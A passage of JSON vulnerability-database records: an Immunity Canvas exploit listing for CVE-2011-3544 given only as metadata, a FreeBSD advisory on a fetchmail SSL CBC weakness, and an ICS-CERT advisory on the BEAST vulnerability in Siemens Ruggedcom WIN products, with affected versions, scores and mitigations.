http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3544 \nDate public: 10/18/2011 \nCVSS: 10 \n\n", "edition": 1, "reporter": "Immunity Canvas", "published": "2011-10-19T17:55:01", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "canvas", "title": "Immunity Canvas: JAVA_RHINO", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3544"], "modified": "2011-10-19T17:55:01", "id": "JAVA_RHINO", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/java_rhino", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2018-08-31T01:15:03", "references": [], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "6.3.22", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "fetchmail", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "6.3.9", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "fetchmail", "operator": "eq"}], "description": "\nMatthias Andree reports:\n\nFetchmail version 6.3.9 enabled \"all SSL workarounds\" (SSL_OP_ALL)\n\t which contains a switch to disable a countermeasure against certain\n\t attacks against block ciphers that permit guessing the\n\t initialization vectors, providing that an attacker can make the\n\t application (fetchmail) encrypt some data for him -- which is not\n\t easily the case.\nStream ciphers (such as RC4) are unaffected.\nCredits to Apple Product Security for reporting this.\n\n", "edition": 3, "reporter": "FreeBSD", "published": "2012-01-19T00:00:00", "title": "fetchmail -- chosen plaintext attack against SSL CBC initialization vectors", "type": "freebsd", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2011-3389"], "modified": "2012-01-19T00:00:00", "id": "18CE9A90-F269-11E1-BE53-080027EF73EC", "href": "https://vuxml.freebsd.org/freebsd/18ce9a90-f269-11e1-be53-080027ef73ec.html", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "ics": [{"lastseen": "2018-09-06T20:02:22", "references": ["https://www.us-cert.gov/forms/feedback?helpful=no&document=ICSA-14-098-03 Siemens Ruggedcom WIN Products BEAST Attack Vulnerability&trackingNumber=&url=https://ics-cert.us-cert.gov/advisories/ICSA-14-098-03&site_name=ICS-CERT", "http://ics-cert.us-cert.gov/content/recommended-practices", "http://www.siemens.com/cert/advisories", "http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:M/Au:N/C:P/I:N/A:N", "https://www.us-cert.gov/forms/feedback?helpful=somewhat&document=ICSA-14-098-03 Siemens Ruggedcom WIN Products BEAST Attack Vulnerability&trackingNumber=&url=https://ics-cert.us-cert.gov/advisories/ICSA-14-098-03&site_name=ICS-CERT", "http://www.us-cert.gov/pdf/", "http://www.us-cert.gov/accessibility/", "https://ics-cert.us-cert.gov/Report-Incident?", "http://www.us-cert.gov/tlp/", "http://www.us-cert.gov/tlp/", "http://ics-cert.us-cert.gov", "http://ics-cert.us-cert.gov", "http://ics-cert.us-cert.gov/tips/ICS-TIP-12-146-01B", "http://twitter.com/icscert", "http://twitter.com/icscert", "http://ics-cert.us-cert.gov/", "https://twitter.com/share?url=https%3A%2F%2Fics-cert.us-cert.gov%2Fadvisories%2FICSA-14-098-03", "http://www.addthis.com/bookmark.php?url=https%3A%2F%2Fics-cert.us-cert.gov%2Fadvisories%2FICSA-14-098-03", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3389", "http://cwe.mitre.org/data/definitions/20.html", "http://www.us-cert.gov/privacy/", "https://www.facebook.com/sharer.php?u=https%3A%2F%2Fics-cert.us-cert.gov%2Fadvisories%2FICSA-14-098-03", "http://www.dhs.gov", "http://www.dhs.gov/report-cyber-risks", "https://www.us-cert.gov/forms/feedback?helpful=yes&document=ICSA-14-098-03 Siemens Ruggedcom WIN Products BEAST Attack Vulnerability&trackingNumber=&url=https://ics-cert.us-cert.gov/advisories/ICSA-14-098-03&site_name=ICS-CERT"], "description": "## OVERVIEW\n\nSiemens has identified a BEAST (Browser Exploit Against SSL/TLS) attack vulnerability in Siemens Ruggedcom WIN products. This vulnerability was originally reported directly to Siemens ProductCERT by Dan Frein and Paul Cotter of West Monroe Partners. Siemens has produced a firmware update that fixes compatibility issues with BEAST mitigations of current browser versions.\n\nThis vulnerability could be exploited remotely.\n\n## AFFECTED PRODUCTS\n\nThe following Siemens Ruggedcom WIN product lines are affected:\n\n * WIN7000: all versions prior to v4.4,\n * WIN7200: all versions prior to v4.4,\n * WIN5100: all versions prior to v4.4, and\n * WIN5200: all versions prior to v4.4.\n\n## IMPACT\n\nAn attacker who successfully exploits a system using this vulnerability may be able to access the session ID of the user\u2019s current web session. If combined with a social engineering attack, the attacker may be able to read traffic exchanged between the user and the device.\n\nImpact to individual organizations depends on many factors that are unique to each organization. NCCIC/ICS-CERT recommends that organizations evaluate the impact of this vulnerability based on their operational environment, architecture, and product implementation.\n\n## BACKGROUND\n\nSiemens is a multinational company headquartered in Munich, Germany.\n\nThe Ruggedcom WIN product line is a family of products compliant with the WiMAX 802.16e Wave 2 mobile broadband wireless standard. The product family includes a variety of base stations and subscriber stations. Siemens estimates that these products are used primarily in the United States and Europe with a small percentage in Asia.\n\n## VULNERABILITY CHARACTERIZATION\n\n### VULNERABILITY OVERVIEW\n\n### IMPROPER INPUT VALIDATIONa\n\nThe SSL/TLS secured web interface of the affected products is vulnerable to the BEAST attack. As it uses SSL libraries, which are not compatible with 1/n-1 record splitting, some newer browser versions are not able to connect to the web interface.\n\nCVE-2011-3389b has been assigned to this vulnerability. A CVSS v2 base score of 4.3 has been assigned; the CVSS vector string is (AV:N/AC:M/Au:N/C:P/I:N/A:N).c\n\n### VULNERABILITY DETAILS\n\n#### EXPLOITABILITY\n\nThis vulnerability could be exploited remotely.\n\n#### EXISTENCE OF EXPLOIT\n\nNo known public exploits specifically target this vulnerability.\n\n#### DIFFICULTY\n\nAn attacker with a moderate skill would be able to exploit this vulnerability.\n\n## MITIGATION\n\nSiemens has provided a firmware update (Ruggedcom WIN v4.4) that supports the mitigation technique and recommends customers to update to this version. The update does not fix the BEAST vulnerability itself. After the update, it is possible for customers to securely access the web interface with current version browsers, as the mitigation for the BEAST attack is contained in the browser code.\n\nFor more information on this vulnerability and detailed instructions, please see Siemens Security Advisory SSA-353456 at the following location:\n\n<http://www.siemens.com/cert/advisories>\n\nICS-CERT encourages asset owners to take additional defensive measures to protect against this and other cybersecurity risks.\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPN is only as secure as the connected devices.\n\nICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page at: <http://ics-cert.us-cert.gov/content/recommended-practices>. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS\u2011CERT Technical Information Paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Mitigation Strategies](<http://ics-cert.us-cert.gov/tips/ICS-TIP-12-146-01B>), that is available for download from the ICS-CERT web site (<http://ics-cert.us-cert.gov/>).\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\n * a. CWE-20: Improper Input Validation, <http://cwe.mitre.org/data/definitions/20.html>, web site last accessed April 08, 2014.\n * b. NVD, <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3389>, web site last accessed April 08, 2014.\n * c. CVSS Calculator, [http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:M/Au:N/C:P/I:N/A:N](<http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:M/Au:N/C:P/I:N/A:N>), web site last accessed April 08, 2014.\n", "edition": 6, "reporter": "Industrial Control Systems Cyber Emergency Response Team", "published": "2014-04-08T00:00:00", "title": "Siemens Ruggedcom WIN Products BEAST Attack Vulnerability", "type": "ics", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "info", "cvelist": ["CVE-2011-3389"], "modified": "2018-09-06T00:00:00", "id": "ICSA-14-098-03", "href": "https://ics-cert.us-cert.gov//advisories/ICSA-14-098-03", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}]}